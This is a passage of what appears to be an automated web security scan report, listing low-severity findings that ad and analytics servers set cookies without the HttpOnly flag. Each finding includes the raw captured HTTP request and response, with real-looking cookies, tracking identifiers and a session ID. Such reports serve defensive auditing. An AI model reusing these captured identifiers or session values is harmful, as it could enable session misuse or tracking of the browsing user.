Cookie: C4=; u2=8023169f-8dce-4de3-84d7-d5a4468633313HG09g; ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; A3=iQQIaFx503Dk00000iKhqaHW208A300001jj9MaH17066N00001iZLfaFB607pd00001j0InaHlY09sO00001j4HbaE.a0a9y00001jGDhaHW50d8900000jcM0aFSa04m400000eDVwaDPh084o00001gY2paFS+09nl00003jGDjaHWf0d8900000hH4jaFhv09wy00001jcL+aFTt04m400000hEI2aE.a09B400001jmnFaEUX09SF00002jGaZaHWf0d8900004johvaFxN07uh00002h52YaGZy0ca700001hUDyaFGt0cbS00001i54CaFsN09MT00000eDVtaDP.084o00001jeoLaF6J07Hs00001j2fVaFWe07aw00001jFY.aHqe0d8900001j2VdaGyd07aw00001j8QYaEBz07LU00001igT+aFh30cXt00001hUBuaFGt0cbS00001jv+zaH1o0d8900002jFZhaHWf0d8900000jAtnaHq602WG00001iBU1aEBz0aVU000019rW0aFGt04uw00001; B3=9yE10000000000up7.Wt0000000001ui9cTR0000000001uf8Dka0000000001uh85Yh0000000001un9abz0000000000ui52BU0000000001ui9fJa0000000001ul8TfJ0000000001uh9eB50000000001uj9yMi0000000000up8Wi10000000001un93M20000000001uf82Np0000000001um9ufH0000000002um99ex0000000001um9yMk0000000000up9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud8Zxy0000000001up9qqo0000000002ui9yDd0000000001un78O70000000001ud9gdG0000000001uh8z+.0000000001uh9pRI0000000002ug9iae0000000001uh9xwn0000000004up7.Ws0000000001ui99y10000000001ui80Dr0000000003uj; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=iQQIaFx503Dk00000j0InaHlY09sO00001iZLfaFB607pd00001jj9MaH17066N00001iKhqaHW208A300001jGDhaHW50d8900000j4HbaE.a0a9y00001eDVwaDPh084o00001jcM0aFSa04m400000jGDjaHWf0d8900000gY2paFS+09nl00003hH4jaFhv09wy00001hEIkaItM0bI400001jmnFaEUX09SF00002hEI2aE.a09B400001jcL+aFTt04m400000jGaZaHWf0d8900004h52YaGZy0ca700001johvaFxN07uh00002i54CaFsN09MT00000hUDyaFGt0cbS00001eDVtaDP.084o00001j2fVaFWe07aw00001jeoLaF6J07Hs00001jFY.aHqe0d8900001j8QYaEBz07LU00001j2VdaGyd07aw00001jv+zaH1o0d8900002hUBuaFGt0cbS00001igT+aFh30cXt000019rW0aFGt04uw00001iBU1aEBz0aVU00001jAtnaHq602WG00001jFZhaHWf0d8900000; expires=Sat, 30-Jul-2011 22:08:15 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7.Wt0000000001ui9yE10000000000up8Dka0000000001uh9cTR0000000001uf85Yh0000000001un52BU0000000001ui9abz0000000000ui9yMi0000000000up9eB50000000001uj8TfJ0000000001uh9fJa0000000001ul8ny40000000001uq9ufH0000000002um82Np0000000001um93M20000000001uf8Wi10000000001un9yMk0000000000up99ex0000000001um9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud9yDd0000000001un9qqo0000000002ui8Zxy0000000001up9gdG0000000001uh78O70000000001ud9pRI0000000002ug8z+.0000000001uh9iae0000000001uh80Dr0000000003uj99y10000000001ui7.Ws0000000001ui9xwn0000000004up; expires=Sat, 30-Jul-2011 22:08:15 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 02 May 2011 02:08:15 GMT
Connection: close
Content-Length: 1831

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
17.78. http://c.bing.com/c.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.bing.com
Path:   /c.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?DI=15074 HTTP/1.1
Host: c.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=; MUID=B506C07761D7465D924574124E3C14DF; OrigMUID=B506C07761D7465D924574124E3C14DF%2c2d5571d309564964970af86c3c5fef46; _SS=SID=54196B2489E649DC9D985351F7EDDDA0&CW=983&CH=903; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Location: http://c.atdmt.com/c.gif?DI=15074&RedC=c.bing.com&MXFR=B506C07761D7465D924574124E3C14DF
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=B506C07761D7465D924574124E3C14DF&TUID=1; domain=.bing.com; expires=Thu, 17-Nov-2011 23:32:33 GMT; path=/;
Date: Sun, 01 May 2011 23:32:32 GMT
Content-Length: 0

17.79. http://c.statcounter.com/t.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.statcounter.com
Path:   /t.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t.php?sc_project=6811643&resolution=1920&h=1200&camefrom=&u=http%3A//bizinformation.co/www.onlinemicrofiche.com&t=www.Onlinemicrofiche.com&java=1&security=0e4e73f2&sc_random=0.7098396345973015&sc_snum=1&invisible=1 HTTP/1.1
Host: c.statcounter.com
Proxy-Connection: keep-alive
Referer: http://bizinformation.co/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_unique_1=sc6761715.1303907356.0; is_unique=sc2226915.1303083753.0-1656416.1303217091.0-6426596.1303907356.0

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:12:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc2226915.1303083753.0-1656416.1303217091.0-6426596.1303907356.0-6811643.1304302344.0; expires=Sat, 30-Apr-2016 02:12:24 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;
17.80. http://clk.atdmt.com/CNT/go/319741851/direct/01/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /CNT/go/319741851/direct/01/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CNT/go/319741851/direct/01/ HTTP/1.1
Host: clk.atdmt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; ach00=903d/120af:fb75/120af:e2ff/25d1; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484; MUID=B506C07761D7465D924574124E3C14DF

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: ach00=903d/120af:fb75/120af:e2ff/25d1:d2ca/12b1e; expires=Tuesday, 30-Apr-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484:cbb7115/12b1e/130edf9b/d2ca/4dbdeda3; expires=Tuesday, 30-Apr-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Sun, 01 May 2011 23:32:51 GMT
Connection: close

17.81. http://csc.beap.ad.yieldmanager.net/i  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://csc.beap.ad.yieldmanager.net
Path:   /i

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /i?bv=1.0.0&bs=(12843fkhk(gid$BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt,st$1304292783218678,v$1.0))&t=J-D&al=(as$12c6r0iom,aid$iFueFUwN7y4-,bi$589320551,ct$25,at$H)&s=0&r=0.17090801848098636&SIG=10v2lvu5s;x-cookie=8xuw7w56dzwfu&o=4&f=qx HTTP/1.1
Host: csc.beap.ad.yieldmanager.net
Proxy-Connection: keep-alive
Referer: http://news.yahoo.com/s/prweb/20110427/bs_prweb/prweb5276794
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=110

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:34:26 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=120;path=/; expires=Tue, 01-May-2013 20:00:00 GMT;domain=.yieldmanager.net
Set-Cookie: S=s=4c2m2vh6rrrg2&t=1304292866;path=/; expires=
Cache-Control: no-cache, private
Accept-Charset: utf-8
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;
17.82. http://d1.openx.org/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /afr.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afr.php?resize=1&campaignid=246606&what=chi160x600&ct0=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBIsVPfQ--TffUN9q86QaO0KkvyMnAgAKQ3aCnJriw6u9EABABGAEgADgBUIDH4cQEYMnug4jwo-wSggEXY2EtcHViLTcyNTExNzM2MDIxMjU3NzWgAeDq_toDsgERd3d3LmphcGFuYXRvci5jb226AQoxNjB4NjAwX2FzyAEJ2gEtaHR0cDovL3d3dy5qYXBhbmF0b3IuY29tL2VsZXBoYW50L2xvZ2luLnBodG1smAKOAsACBMgCgOr2FqgDAegDvQL1AwAAAOQ%26num%3D1%26sig%3DAGiWqtwQa1xoRafBymiCbfwPHRB1hm9EPA%26client%3Dca-pub-7251173602125775%26adurl%3D;cb=1442324580& HTTP/1.1
Host: d1.openx.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=bba0cb56df6b6edbf6102c35304755de

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:07:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=bba0cb56df6b6edbf6102c35304755de; expires=Tue, 01-May-2012 02:07:47 GMT; path=/
Content-Length: 2280
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
17.83. http://d1.openx.org/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /lg.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lg.php?bannerid=522976&campaignid=246606&zoneid=0&OXLIA=1&loc=1&cb=64cd0da313&r_id=85dbdb9e09296233a4d7b328928878f8&r_ts=lkjpfk HTTP/1.1
Host: d1.openx.org
Proxy-Connection: keep-alive
Referer: http://d1.openx.org/afr.php?resize=1&campaignid=246606&what=chi160x600&ct0=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBIsVPfQ--TffUN9q86QaO0KkvyMnAgAKQ3aCnJriw6u9EABABGAEgADgBUIDH4cQEYMnug4jwo-wSggEXY2EtcHViLTcyNTExNzM2MDIxMjU3NzWgAeDq_toDsgERd3d3LmphcGFuYXRvci5jb226AQoxNjB4NjAwX2FzyAEJ2gEtaHR0cDovL3d3dy5qYXBhbmF0b3IuY29tL2VsZXBoYW50L2xvZ2luLnBodG1smAKOAsACBMgCgOr2FqgDAegDvQL1AwAAAOQ%26num%3D1%26sig%3DAGiWqtwQa1xoRafBymiCbfwPHRB1hm9EPA%26client%3Dca-pub-7251173602125775%26adurl%3D;cb=1442324580&
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=bba0cb56df6b6edbf6102c35304755de

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:08:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=bba0cb56df6b6edbf6102c35304755de; expires=Tue, 01-May-2012 02:08:35 GMT; path=/
Set-Cookie: _OXLIA[522976]=lkjpfk-0+85dbdb9e09296233a4d7b328928878f8; expires=Wed, 01-Jun-2011 02:08:35 GMT; path=/
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;
17.84. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTcwJnRsPTQzMjAw&piggybackCookie=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&r=http://a.triggit.com/pxpucm HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; KRTBCOOKIE_53=424-c1e1301e-3a1f-4ca7-9870-f636b5f10e66; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 01:56:32 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104; domain=pubmatic.com; expires=Fri, 25-Apr-2014 18:46:33 GMT; path=/
Location: http://a.triggit.com/pxpucm
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://a.triggit.com/pxpucm">here</a>.</p>
<hr>
...[SNIP]...
17.85. http://insurancenewsnet.com/article.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://insurancenewsnet.com
Path:   /article.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /article.aspx?id=257992 HTTP/1.1
Host: insurancenewsnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=600
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=1k3l4a55gy1fk4jf5xabtr45; path=/; HttpOnly
Set-Cookie: INNid=1k3l4a55gy1fk4jf5xabtr45; expires=Tue, 01-May-2012 23:33:25 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:33:25 GMT
Content-Length: 74743


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Insur
...[SNIP]...
17.86. http://loadm.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadm.exelator.com
Path:   /load/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/?p=204&g=001&bi=CAESENh7sluIi3Lo5TRo_oosBvM&cver=1&j=0 HTTP/1.1
Host: loadm.exelator.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9jbS5nLmRvdWJsZWNsaWNrLm5ldC9waXhlbD9uaWQ9ZXhlbGF0ZSZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vYWRzLmFkYnJpdGUuY29tL2Fkc2VydmVyL2JlaGF2aW9yYWwtZGF0YS84MjAxP2Q9MTAzMSIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0xNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=8d858ba9e9afa8b40a627b6ea0e852d0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJwdy6sOwzAMQNF%252FMY%252FkxI8kLlxJyUg1PNWpKw1PQ1P%252FfQ92wbmbFXs%252FjQxuywzTt4pBrsLuKqiFhngwHWNDlzqoZ9z7z%252BVs8Hrs97UgL9fLf1WDQVFEOVJt7omPkOSYNfXwaNGQFQmm8wNVyR9D; BFF=eJylks0OgjAQhN%252BFJ%252BgflpYLigdJpCbSEDwZjp49qu9uBVKX0oI%252F1%252F12pt3MtBIn8naVOJZRRRArVH5HOBNCxFF6MWOOUkOpjMqD0rv96VwXVaGjtJVEfCBEkEJALHA13BLHSGPEytc2GQA2IB7mYDTapR6gAiYqtDsyGQ5eb5vh4FVPEwIO7ikExAJXwy1xjI5lk2HzOicA0G7u2RQIJxg5YL3RU0C7Ody0IdbjEEc39dRzkwGuxoZYw30OjIj%252Fw28OAQMPTVQcdGzWNQ%252B55q7qMdtQbxlZqHlsrnm%252F1izcpmBxvu%252FJQi3C6S8G%252FVeeM7E9AdjlJeY%253D; TFF=eJyNkj0OgzAMRu%252FCCWyTkNgsHKMrA0Olbu2GuHtNy28SkAeUEL2XfB%252BkF2QZ34IkFYHrwGPHzFS1vZCMT8FWHx9AB1inU8b7ma8Tntr%252F69ELm2YzdA2cfe%252FhMbz6z5DsHWkxfKEFznEaKLZ2O48FPuvglnMo8cKm2Qwds9YrWV9kIix3wHs%252B64D51z12UM1q%252FO4Ixg6ASsni3lmnM%252B92HpnrQFf%252FEW9MBoxZxmvznDG9x1avsXph02yGrmE0kdMXsnf1Bw%253D%253D; EVX=eJyNjLENgDAMBHfJBP%252BGENsZxkqZmhJld5IGCYmC7qQ7XfPNr%252B5mlmtzWYx6OtUTc0GUEOyBzJBgqt35WJVlqQFIYNkxR6ASc8X36js2O36l4wb%252Bpiq9

Response

HTTP/1.1 302 Found
X-Cnection: close
X-Powered-By: PHP/5.2.1
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: image/gif
Set-Cookie: xltl=eJxdi7EKgzAURf%252Fl7YEkLy%252FROFl1EFqH2kI38cVIhUIGsUvpv9d27HK4HO4ZPfrXugOubQ3FvrQH5cgwW5JWYyCOBucwSiYXMFdyyr8%252FpTxsyzT0Wpq2q36p9RAwarImCpcxCzNHEiyVFXnkmMVMGivxPy%252Fr21dp56Eqm77p7m59bO2Cx0SXcxpSWg%252FPExTvD46AL4M%253D; expires=Tue, 30-Aug-2011 01:58:26 GMT; path=/; domain=.exelator.com
Set-Cookie: BFF=eJylk8FugzAMht%252BFJ0icZCnhAmOHIhUqDYTYaepx5x67vXtTglInjek2rv78%252F8T498kAmMvZcGWyHphsuvqb8TLPc5UVX7asWWGpMFl77Ib94eNzbPpmyIqTEeoXQoYpBuBBrNGeREYDZ7K9dcMCuAVqqaNS0CsSoCNMOqo3MFkGrt6mZeAXR3eABnYUA%252FAg1mhPIqP3diq5%252FboGBMRcT3TmjO84i0D1OjwCMddxp1%252FiGC4xmMnRxEwWxBq%252FxBH3a2QE6QffOQYSfehBpVHGVl1ryrVOqPCagfoljtJrVol3zhpBv9PxxDtnz1D1s3pJyaOR1IXItQv57znQqScD%252Fvc8P4kvndKngdyUuw3x2pCilbBcAf0YadM%253D; expires=Tue, 30-Aug-2011 01:58:26 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJyVk00OgyAQRu%252FiCWYG5GfceIxuXbho0l27M969UK2oAwYXBiTvke8THJgUT29G4oZA99Bi772nphuYeHoyduFpLYQB%252FtNZ8G3k1Ymnbnnde3bT6oywBvpIOlpJknuPj%252FE1fMamYJhMC4xxDGRb68RjhhcdtEyGa7JVqzPCeG69kaqQiTDfAa950QHlOew7BK3W%252BN0RdD0A5ZK51DlMI68Tj94rS6VzxAvTAzqRsWweM57vca1naj27aXVGWEN3J1O8ZpD9h%252BX3PvL3uifvVvdFqzPmL8HjKUg%253D; expires=Tue, 30-Aug-2011 01:58:26 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 02-May-2010 01:58:25 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 02-May-2010 01:58:25 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJyFjjEOgDAMA%252F%252FCC%252BxAIU0fE3XszIj6dwqVkKADW6Szc84221EsxhhS7jfSblSbGDb45oLFEejinFIxPlTlolQHxNGpfOjVBTutTQMq0UR8i8ZX9d60tqj8RcdNL2s9AYowOVA%253D; expires=Tue, 30-Aug-2011 01:58:26 GMT; path=/; domain=.exelator.com
Location: http://load.s3.amazonaws.com/pixel.gif
Content-Length: 0
Date: Mon, 02 May 2011 01:58:26 GMT
Server: HTTP server

17.87. http://loadus.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /load/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/?p=218&g=002&c=153225 HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJwdy6sOwzAMQNF%252FMY%252FkxI8kLlxJyUg1PNWpKw1PQ1P%252FfQ92wbmbFXs%252FjQxuywzTt4pBrsLuKqiFhngwHWNDlzqoZ9z7z%252BVs8Hrs97UgL9fLf1WDQVFEOVJt7omPkOSYNfXwaNGQFQmm8wNVyR9D; EVX=eJxLtDK0qs60srS0NLVOhLANrIutDC2slAxNzQ3izeONDEziDUwN443iDZWsa2sBRqkNBg%253D%253D; BFF=eJxLtDK3qi62MjS1Ugo2MjDx9HOuMTB0sLS0NFWyzgQKmxtYA2WNrZR8%252Ff1CPHwi48M8gz1DlKwTrQwNiNBogCyLLGEEl0DXYw6XQTMoxNDAxBek2ggqYQiUMIWKIwmhqDXGIuGHwxA%252FXGoRhtTidTpWV5rgcpIJPifhsh8AGMBniA%253D%253D; TFF=eJyNkD0OwyAMRu%252BSE9gGioCFY2RlYKjUrdki7l6jhghhWjHw%252F57hI3kkf75rvxHoCAajc462kDwfPD0GbsYCD9CmRfCm8mrgKXyXvWdvbc3gPdDrtfOeX%252BnIY219GXqSAutzHjBN3fE44UWGdg8Nnr21NYNHkbqR6sebCOcZ8D8vMqD83T4Da2tG%252BQCHK5kT

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: application/x-javascript
